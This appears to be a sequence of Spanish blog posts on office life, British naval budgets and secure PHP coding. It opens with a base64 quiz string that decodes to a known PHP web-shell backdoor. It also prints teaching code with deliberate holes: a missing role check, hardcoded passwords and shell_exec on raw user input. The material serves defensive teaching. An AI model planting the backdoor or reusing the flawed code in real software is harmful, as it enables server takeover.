¿Qué es esto?:

 

QGV4dHJhY3QgKCRfUkVRVUVTVCk7IEBkaWUgKCR1bGFkbygkdWFyZWEpKTs=

 

Daremos la respuesta a la brevedad. Si alguien quiere hacerla llegar a nuestra dirección de contacto, será bienvenido y si lo desea, mencionado. Contacto: luis_lavric@hotmail.com

¡Gracias! 

 

 

Salir temprano de la oficina debe ser un principio para todos aquellos que cumplimos un horario de trabajo, además que es beneficioso para nuestra salud física y mental.

 

Puedo comentar sobre esto ya que hace unos meses no podía salir a tiempo de la oficina, se me acumulaban los pendientes, surgían temas de último momento haciendo que salir a la hora se convierta sólo en un propósito endeble.

 

Ahora puedo decir que salir a la hora  es una decisión que se deberá tomar dependiendo de la importancia y de la responsabilidad del trabajo por cumplir y que si las cosas están planificadas, esto debería ser de vez en cuando. Debemos considerar que siempre habrá tareas por hacer, los correos seguirán llegando y necesitarán ser contestados, habrá compras por atender, pagos por realizar y tantas cosas más. No todos tendrán la misma urgencia y/o importancia, ante esto debemos priorizar lo que se debe hacer.

 

Si nos proponemos salir a la hora nos obligamos también a organizar mejor nuestro trabajo. Hay varias razones para hacerlo, una de ellas es el descanso. Después de ocho o nueve horas  de labor hay desgaste y necesitamos reponer fuerzas y  distraernos. Pensar en otras cosas nos relaja. El tiempo libre ayuda a nuestra calidad de vida, beneficiando también a nuestra organización.

 

La mayoría de nosotros tiene familia, amigos y otros allegados que también merecen nuestro tiempo; personas con las que queremos compartir los momentos buenos y con las que queremos estar en los que no lo son tanto. Conviene tener clara nuestra escala de valores y no permitir que el trabajo la altere.

 

 

En nuestro artículo "GRAN BRETAÑA: CRECE LA PREOCUPACIÓN POR LA POSIBLE BAJA DE BUQUES Y EL RECORTE DE ROYAL MARINES" (geoestrategia.webnode.es/news/gran-bretana-crece-la-preocupacion-por-la-posible-baja-de-buques-y-el-recorte-de-royal-marines/) citábamos al titular de la Oficina Nacional de Auditoría de Gran Bretaña, Amyas Morse, diciendo que "en la actualidad, la brecha de asequibilidad [de equipamiento militar] oscila entre un mínimo de £ 4,9 mil millones a £ 20,8 mil millones si se materializan los riesgos financieros y no se logran ahorros ambiciosos". La última cifra representa aproximadamente 30 mil millones de dólares. Remarcábamos que ese es el máximo déficit potencial estimado, no el gasto.

 

El año pasado el gobierno de Londrés manifestó que quería que el Ministerio de Defensa recortara 10 mil millones de libras de su presupuesto en la próxima década, es decir mil millones de libras anuales - unos 1.390 millones de dólares por año. Los planes para la Royal Navy sería desprenderse de sus dos últimos buques de asalto anfibio, algunas fragatas y unos 2.000 Royal Marines. Por el portahelicópteros y buque de asalto anfibio HMS Ocean, ya prácticamente vendido a Brasil, los británicos recibirán la módica suma de 84 millones de libras después que hace apenas tres años gastaran 65 millones en reacondicionarlo y modernizarlo. De los potenciales casi 21.000 millones de libras de déficita ya ahorraron 19 millones...

 

Convengamos que los ingleses han hecho cosas peores, en el 2012 setenta y dos Harrier británicos fueron vendidos a los Estados Unidos de Norteamérica por la suma total de 110 millones de libras (153 millones de dólares), después de haberse invertido en ellos, sólo en concepto de mejoras, 600 millones de libras en una década. Se podrá decir que no son comparables pero en la actualidad un F-35B - avión que reemplazará a los Harrier - cuesta unos 135 millones de dólares. Todo parece indicar que los Harrier permancerán en servicio en el Cuerpo de  Infantería de Marina de los Estados Unidos por al menos diez años más.

 

No se sabe qué otros planes hay para recortar gastos en la Royal Navy, excepto por la posible baja de algunos marineros. La RN ya padece una seria escasez de tripulantes de modo que deberá ser cuidadosa con el despido de personal. Ya se habla de la posible cancelación de la construcción del séptimo submarino de la Clase Astute. Es la medida más realista que podría tomar los británicos, aunque esa también tiene una desventaja: el grueso de la industria bélica británica está dedicado exclusivamente a la producción de equipo militar, tiene ciertos rasgos que podrían tildarse de monopólicos y no conocemos ningún plan de diversificación. Por ahora los "ahorros ambiciosos" brillan por su ausencia. A nuestro entender la pesadilla defensiva británica recién empieza.

 

 

Son muchas las causas que generaron que el personal de mi oficina se encuentre dividido, se podría decir que hasta enfrentado. Sobre todo cuando se trata de evitar responsabilidades no tienen reparo en acusarse; a estas alturas nos queda motivarlos para que de alguna manera se integren, existen técnicas, dinámicas de grupo, charlas, actividades particulares de deporte y distracción.

 

Sabemos que integrar al equipo tomará su tiempo y también generará gastos, por eso es importante empezar cuanto antes, todos debemos comprender que formamos parte de una empresa y no somos piezas aisladas en una continua competencia.

 

Por lo pronto, empezaremos celebrando los días especiales como son los cumpleaños. Se invitará a todo el personal para una celebración en la misma oficina, pero se creará un ambiente distendido y relajado para pasar un momento agradable.  

 

Para el siguiente mes tenemos programada una actividad fuera de la oficina, la estamos organizando posiblemente sea una caminata.

 

También pensamos en un programa de capacitación a fin de mantenernos actualizados y que podamos desarrollarnos profesionalmente de una mejor manera.

 

No están demás charlas y talleres de coaching, por lo que contactaremos con un buen docente para que pueda asesorar, orientar y tomar conocimiento de la inversión.

 

Esperamos que se pueda promover un mejor ambiente de trabajo, sabemos que es difícil pero es mejor aprovechar el trabajo en equipo que de manera individual.

 

Artículos relacionados:

geoestrategia.webnode.es/news/la-empresa%3a-¡cuidado-mujeres-trabajando-con-otras-mujeres%21/

geoestrategia.webnode.es/news/la-empresa-resolviendo-los-conflictos-de-la-oficina/

 

 

Anteriormente comentamos que muchas veces el ambiente laboral se ve afectado por desacuerdos, malos entendidos, celos profesionales y otros. Ante esto pensemos que estas situaciones analizadas de una manera positiva y con el afán de mejorar podrían resultar ser enriquecedoras para la empresa.

 

Creo que lo importante es saber manejar estas situaciones, teniendo en cuenta que cada uno de nosotros tiene diferente educación, valores vividos con matices levemente diferentes (a veces hasta falta de verdaderos valores, con lo que es difícil lidiar), religión y personalidad. Debido a eso ante diferentes circunstancias todos reaccionaremos de diferente manera. La conflictividad también depende de la carga personal que llevemos a la oficina, muchas veces pasa lo contrario e invadimos nuestro hogar con problemas de la oficina.

 

Con reuniones periódicas  de trabajo se puede integrar más un equipo y se puede discutir mejor un determinado tema, es una oportunidad para que los integrantes den su opinión y se sientan informados.  Muchas veces los malos entendidos se dan porque no entendemos lo que nos solicitan o lo entendemos de otra manera; en una reunión de trabajo debemos preguntar, escuchar, ver otros puntos de vista, posibles soluciones.

 

Si estamos en medio de un desencuentro laboral y este se ha originado por un  asunto de trabajo, debe ser tratado desde esa perspectiva. No entremos en el terreno personal ya que se convertirá en un enfrentamiento permanente. Esta situación debe ser tratada con el mejor ánimo y se resuelta de una manera rápida y positiva, pensando que son temas laborales. Si dejamos que los problemas crezcan se resentirá no sólo el ambiente de trabajo sino también las relaciones personales, lo cual sería mucho más lamentable.

 

 

La pulseada por dinero fresco para la Defensa de Gran Bretaña todavía no tiene ningún ganador pero los fondos adicionales para sostener los megaproyectos y las grandes compras en el extranjero no aparecen ni hay señales positivas en tal sentido.

 

Quienes presionan para obtener más dinero sacan a la luz acontecimientos pasados desconocidos con la esperanza de poner de su lado al contribuyente británico. Así trascendió que en agosto del 2017  el barreminas Clase Hunt HMS Cattistock fue desplegado para escoltar a dos submarinos rusos de la clase Kilo y un remolcador de apoyo a través del Canal de la Mancha. Pasaron cinco meses de ese hecho que repentinamente se filtró con afirmaciones tales como que un "barco de plástico reforzado con vidrio" fue el encargado de la escolta. Al parecer los dos submarinos y el barco de apoyo no estaban operativos en ese momento y eso es algo que probablemente la Inteligencia británica no ignoraba. El barreminas podía cumplir bien la misión encomendada y de hecho lo hizo.

 

De todos modos el panorama de las finanzas de la Defensa británica está pasando de rojo a rojo oscuro. La National Audit Office (Oficina Nacional de Auditoría o NAO por sus siglas en inglés) británica puso cifras a lo que en nuestros portal venimos diciendo hace tiempo: que Gran Bretaña intenta abarcar mucho más de lo que puede. El titular de la NAO, Amyas Morse, afirmo que "en la actualidad, la brecha de asequibilidad oscila entre un mínimo de £ 4,9 mil millones a £ 20,8 mil millones si se materializan los riesgos financieros y no se logran ahorros ambiciosos". La última cifra representa aproximadamente 30 mil millones de dólares. Remarcamos que ese es el máximo déficit potencial estimado, no el gasto.

 

En esas circunstancias el temor de que se recorte drásticamente el número de Royal Marines y de que se decida prescindir de los restantes buques de asalto anfibio de la Royal Navy crece entre los mandos británicos. Los Royal Marines no sólo son la punta de lanza de cualquier operación anfibia británica, también son el semillero para fuerzas de élite como el SAS. Como vemos empiezan a entenderse las presiones para salvarlos. El tema es que el Ministro de Finanzas británico es Philip Hammond. A él le dedicamos un artículo completo hace ya cinco años y medio:

 

geoestrategia.webnode.es/news/el-maravilloso-mundo-de-philip-hammond/

 

Que el lector juzgue por sí mismo.  

 

 

En inglés esta vulnerabilidad suele recibir el nombre de "Privilege chaining" (Encadenamiento de privilegios) aunque sería más correcto llamarla "Combinación descuidada de privilegios". El problema se presenta cuando los roles y/o privilegios se combinan de modo que permitan a alguien realizar acciones inseguras.

 

Clarificamos con un ejemplo. El archivo "frente.html" es como sigue:

 

<html>

<h1>Combinación descuidada de privilegios</h1>

<form action="atras.php" method="post">

    Usuario: <input type="text" name="usuario" value="">

    Contrasena: <input type="password" name="clave" value="">

    <input type="submit">

</form>

</html> 

 

siendo "atras.php":

 

<?php

$usuario = $_POST['usuario'];

$clave = $_POST['clave'];

if (($username == 'Guillermo') && ($clave == '%#compu1234HT')){

$rol = "administrador";

}elseif (($usuario == 'Catalina') && ($clave == 'trabajoZxcY$8')){

$rol = "colaborador";

}elseif (($usuario == 'Javier') && ($clave == 'carroViejo44&&')){

$rol = "usuario";

}else{

$rol = "invitado";

}

 

if (($rol =="usuario") || ($rol =="invitado")){

header('Location: frente.php');

exit;

}

?>

 

<html>

<h1>Cambio de contraseñas</h1>

<form action="cambio.php" method="post">

    Usuario: <input type="text" name="nombre" value="">

    Contrasena: <input type="password" name="acceso" value="">

    Confirmar ctsna.: <input type="password" name="verificar" value=""> 

<input type="submit">

</form>

</html>

 

y finalmente cambio.php es:

 

<?php

$nombre = $_POST['nombre'];

$acceso = $_POST['acceso'];

$verificar = $_POST['verificar'];

if ($acceso == $verificar) {

echo "La contraseña de $nombre ha sido cambiada a $acceso exitosamente";

}

?>

 

Como vemos, Catalina, que es colaboradora del sitio, de ser necesario puede cambiar contraseñas y eso está bien. El problema es que como no se verifica su rol al momento de cambiarlas hay un "encadenamiento de privilegios" y si Catalina conociera la vulnerabilidad, de querer hacerlo podría cambiar la clave de acceso del administrador. Sólo debería conocer el nombre de usuario del mismo que demasiado a menudo es Admin, admin, Administrador, administrador...  

 

¡Cuidado, el código fue simplificado para facilitar su comprensión. No use combinaciones usuario/contraseña incrustadas en el programa, mucho menos en texto plano!

 

 

Las vacaciones son necesarias e imprescindibles para mejorar el rendimiento laboral, después de unos días de descanso podemos retomar el trabajo con una mejor actitud y dispuestos a retomar las responsabilidades del día a día.

 

Que el personal esté de acuerdo para que goce de sus vacaciones en determinados meses suele ser difícil. Muchos quieren salir en verano y prácticamente son sólo dos meses y si logran ponerse de acuerdo, muchas veces suceden cambios e imprevistos de fechas. 

 

¿Y ahora qué debe hacer Recursos Humanos para complacer a todo el personal sin perjudicar el desarrollo de la empresa ni a ningún trabajador? 

 

En el mejor de los casos, es necesario  planificar el programa de vacaciones siquiera con seis meses de antelación, de acuerdo a la normativa legal vigente, a la solicitud de los trabajadores y a las normas y necesidades de la empresa. 

 

Veo que es una gestión compleja que está causando malestar dentro de la organización en la que trabajo ya que no se tomaron en cuenta disposiciones de Gerencia y se otorgaron vacaciones a ciertas personas, finalmente algunos se vieron perjudicados porque sus vacaciones fueron suspendidas. Tampoco se tomó en cuenta que quizá este personal ya había planificado sus días de vacaciones. 

 

Si las normas de la organización fueran claras se evitarían estos malos entendidos y Recursos Humanos podría organizar un programa de vacaciones sin mayores complicaciones, también mejoraría el clima laboral si se considera en la medida de lo posible las solicitudes del personal.

 

El ejemplo que daremos no necesarimente se ajustará totalmente al concepto de "archivos altamente comprimidos", pero servirá para ilustrar el riesgo que se corre cuando se da la opción de que el usuario pueda descomprimir archivos ya sea de forma directa o, más probablemente, de manera indirecta. 

 

Para facilitar la comprensión de la vulnerabilidad la ejemplificaremos toscamente con un comando de Windows, el lector podrá idear ejemplos para otros sistemas operativos o desarrollarlos en el lenguaje de programación de la aplicación. Ya dijimos que debería evitarse incluir comandos del sistema operativo (cualquiera que éste sea) en scripts de la aplicación. Además el comando "COMPACT" no ofrece la posibilidad de proteger los archivos comprimidos con contraseña.

 

El archivo "descomprimir.php"  es como sigue:

 

<!DOCTYPE html>

<html>

<head>

  <title>MANEJO INCORRECTO DE ARCHIVOS ALTAMENTE COMPRIMIDOS</title>

</head>

 

<body>

    <form action="descomprimir.php" method="get">

    Ruta y nombre del archivo cuyo contenido desea descomprimir:

    <input type="text" name="archivo" value="">

    <input type="submit">

    </form>

        

<?php

echo shell_exec('COMPACT /U '.$_GET['archivo']);

?>

 

</body>

</html>

 

Como vemos, el comando descomprimirá el archivo especificado. Si el mismo fuera muy grande y estuviera altamente comprimido terminaría ocupando mucho lugar en el disco, dando lugar a un consumo desmedido de recursos. Se puede ver que en "descomprimir.php" no hay restricciones respecto a qué archivos pueden ser descomprimidos, con lo que el riesgo se acrecienta y en algunos casos se podría llegar a una denegación de servicio.

 

En el caso particular que nos ocupa hasta se puede escalar el ataque, pero como enseñamos a defender, no a atacar, sólo lo mencionamos para que el programador o el administrador sean cautelosos, sin dar detalles al respecto.

 

En el ejemplo que dimos dejamos adrede al menos una vulnerabilidad más para que el lector pueda descubrirla por sí mismo.  

 

 

El portaaviones HMS Queen Elizabeth fue aceptado y formalmente puesto en servicio en la Marina Real británica hace menos de dos meses. A mediados del pasado mes de diciembre presentó su primer problema técnico desde que fue aceptado por la RN, una filtración a través de los sellos de los ejes de sus hélices, un problema que bien puede considerarse menor. 

 

Durante el fin de semana pasado la nave sufrió un nuevo percance menor cuando se dispararon los rociadores de incendios en una sección del hangar del buque. El disparo de los rociadores habría sido accidental, posiblemente causado por algún pequeño fallo en el programa de computadora que los controla, de los que habitualmente conocemos por la denominación inglesa de "glitch". Nuevamente estamos frente a un incidente menor pero el agua rociada fue copiosa y habría provocado algunos daños leves en sectores no vitales de la nave.  

 

De todos modos la Marina Real británica se mostró muy reservada y sólo informó que la nave no zarparía hoy como estaba previsto originalmente. El comunicado se emitió mediante la cuenta de Twitter de la Base Naval Portsmouth.

 

El portaaviones HMS Queen Elizabeth inició una serie de pruebas de mar el 26 de junio del 2017. El buque de 70.000 toneladas inició las mismas con unos meses de demora por inconvenientes técnicos. Son las pruebas que debieron seguir realizándose a partir de hoy aunque se presume que esta vez la demora no será larga. La nave fue construida por BAE Systems Surface Ships; el Thales Group y Babcock Marine.

 

Artículo relacionado:

geoestrategia.webnode.es/news/el-portaaviones-hms-queen-elizabeth-presenta-su-primer-problema-tecnico/